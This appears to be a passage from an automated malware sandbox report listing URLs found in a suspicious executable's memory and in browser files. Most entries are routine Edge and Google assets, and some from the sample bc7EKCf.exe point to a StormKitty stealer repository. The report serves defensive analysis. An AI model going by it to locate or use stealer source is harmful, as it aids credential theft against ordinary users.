                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: Network Persistent State0.14.drString found in binary or memory: https://chrome.cloudflare-dns.com
                Source: manifest.json.14.drString found in binary or memory: https://chrome.google.com/webstore/
                Source: manifest.json.14.drString found in binary or memory: https://chromewebstore.google.com/
                Source: 23be4805-ca70-4593-b6ee-9bc67407429b.tmp.15.drString found in binary or memory: https://clients2.google.com
                Source: manifest.json0.14.drString found in binary or memory: https://clients2.google.com/service/update2/crx
                Source: 23be4805-ca70-4593-b6ee-9bc67407429b.tmp.15.drString found in binary or memory: https://clients2.googleusercontent.com
                Source: chromecache_593.8.drString found in binary or memory: https://clients6.google.com
                Source: chromecache_593.8.drString found in binary or memory: https://content.googleapis.com
                Source: Reporting and NEL.14.drString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: manifest.json0.14.drString found in binary or memory: https://docs.google.com/
                Source: chromecache_593.8.drString found in binary or memory: https://domains.google.com/suggest/flow
                Source: manifest.json0.14.drString found in binary or memory: https://drive-autopush.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-0.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-1.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-2.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-3.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-4.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-5.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-daily-6.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-preprod.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive-staging.corp.google.com/
                Source: manifest.json0.14.drString found in binary or memory: https://drive.google.com/
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: tmp473E.tmp.dat.2.dr, tmp470E.tmp.dat.2.dr, tmpF945.tmp.dat.2.dr, Web Data.14.dr, tmpF934.tmp.dat.2.drString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: 000003.log9.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/arbitration_priority_list/4.0.5/asset?assetgroup=Arbit
                Source: 000003.log8.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtrac
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_163_music.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_dark.png/1.7.32/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_hc.png/1.7.32/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_M365_light.png/1.7.32/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_hc.png/1.2.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_dark.png/1.2.1/ass
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_action_center_maximal_light.png/1.2.1/as
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_amazon_music_light.png/1.4.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_apple_music.png/1.4.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_bard_light.png/1.0.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.1.17/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_dark.png/1.6.8/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.1.17/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_active_light.png/1.6.8/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.1.17/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_chatB_hc.png/1.6.8/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_hc.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_dark.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_collections_maximal_light.png/1.0.3/asse
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_deezer.png/1.4.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_dark.png/1.0.6/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_demo_light.png/1.0.6/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_color.png/1.0.14/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_designer_hc.png/1.0.14/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_hc.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_dark.png/1.1.12/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_edrop_maximal_light.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_hc.png/1.2.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_dark.png/1.2.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_etree_maximal_light.png/1.2.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_excel.png/1.7.32/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_facebook_messenger.png/1.5.14/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gaana.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc.png/1.7.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_controller.png/1.7.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_hc_joystick.png/1.7.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark.png/1.7.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_controller.png/1.7.1/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_dark_joystick.png/1.7.1/as
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light.png/1.7.1/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_controller.png/1.7.1
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_games_maximal_light_joystick.png/1.7.1/a
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_gmail.png/1.5.4/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_help.png/1.0.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_hc.png/0.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_dark.png/0.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_history_maximal_light.png/0.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_iHeart.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_hc.png/1.0.14/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_dark.png/1.0.14/as
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_image_creator_maximal_light.png/1.0.14/a
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_instagram.png/1.4.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_ku_gou.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_last.png/1.0.3/asset
                Source: 000003.log9.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_manifest_gz/4.7.107/asset?assetgroup=Sho
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_dark.png/1.1.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_hc.png/1.1.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_maximal_follow_light.png/1.1.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_naver_vibe.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_dark.png/1.4.9/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_hc.png/1.4.9/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_onenote_light.png/1.4.9/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_dark.png/1.9.10/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_hc.png/1.9.10/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_outlook_light.png/1.9.10/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_hc.png/1.1.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_dark.png/1.1.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_performance_maximal_light.png/1.1.0/asse
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_power_point.png/1.7.32/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_qq.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_dark.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_hc.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_refresh_light.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_hc.png/1.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_dark.png/1.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_rewards_maximal_light.png/1.1.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_hc.png/1.3.6/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_dark.png/1.3.6/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_search_maximal_light.png/1.3.6/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.4.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_dark.png/1.5.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.4.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_hc.png/1.5.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.1.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.4.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_settings_light.png/1.5.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_hc.png/1.4.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_dark.png/1.4.0/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_shopping_maximal_light.png/1.4.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_dark.png/1.3.20/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_hc.png/1.3.20/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_skype_light.png/1.3.20/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_sound_cloud.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_spotify.png/1.4.12/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_dark.png/1.2.19/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_hc.png/1.2.19/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_teams_light.png/1.2.19/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_telegram.png/1.0.4/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_hc.png/1.0.5/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_dark.png/1.0.5/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_theater_maximal_light.png/1.0.5/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tidal.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_tik_tok_light.png/1.0.5/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_hc.png/1.5.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_dark.png/1.5.13/asset
                Source: HubApps Icons.14.dr, ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_toolbox_maximal_light.png/1.5.13/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_twitter_light.png/1.0.9/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_vk.png/1.0.3/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whats_new.png/1.0.0/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_whatsapp_light.png/1.4.11/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_word.png/1.7.32/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_yandex_music.png/1.0.10/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://edgeassetservice.azureedge.net/assets/edge_hub_apps_youtube.png/1.4.14/asset
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://excel.new?from=EdgeM365Shoreline
                Source: chromecache_590.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey200-36dp/2x/gm_alert_gm_grey200_3
                Source: chromecache_590.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/alert/v11/gm_grey600-36dp/2x/gm_alert_gm_grey600_3
                Source: chromecache_590.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey200-24dp/1x/gm_close_gm_grey200_2
                Source: chromecache_590.8.drString found in binary or memory: https://fonts.gstatic.com/s/i/googlematerialicons/close/v19/gm_grey600-24dp/1x/gm_close_gm_grey600_2
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://gaana.com/
                Source: bc7EKCf.exe, 00000002.00000002.2005165287.00000000077A0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/JamesNK/Newtonsoft.Json
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000324F000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.00000000030F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/LimerBoy/StormKitty0&fq
                Source: bc7EKCf.exe, 00000002.00000002.1976369045.00000000030B0000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976402820.00000000030C0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/StephenCleary/AsyncEx
                Source: bc7EKCf.exe, 00000002.00000002.1995301685.00000000056E0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/StephenCleary/Disposables
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2007888532.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2007888532.0000000007C00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/corefx/tree/7601f4f6225089ffb291dc7d58293c7bbf5c5d4f8
                Source: bc7EKCf.exe, 00000002.00000002.2010903453.00000000081EB000.00000004.00000020.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1985383738.0000000004119000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1976480263.00000000036D2000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2008008650.0000000007C10000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2009530198.0000000007FD0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/maintenance-packages
                Source: bc7EKCf.exe, 00000002.00000002.1976480263.000000000368C000.00000004.00000800.00020000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2012775385.0000000008B00000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2010931634.0000000008420000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2011473460.0000000008A10000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.2009256026.0000000007FB0000.00000004.08000000.00040000.00000000.sdmp, bc7EKCf.exe, 00000002.00000002.1999064795.0000000006650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://github.com/dotnet/runtime
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://i.y.qq.com/n2/m/index.html
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s-msn-com.akamaized.net/
                Source: 2cc80dabc69f58b6_1.14.drString found in binary or memory: https://img-s.msn.cn/tenant/amp/entityid/
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://latest.web.skype.com/?browsername=edge_canary_shoreline
                Source: ec5714da-0767-4ddb-bf80-e1950ca1e2c1.tmp.14.drString found in binary or memory: https://m.kugou.com/
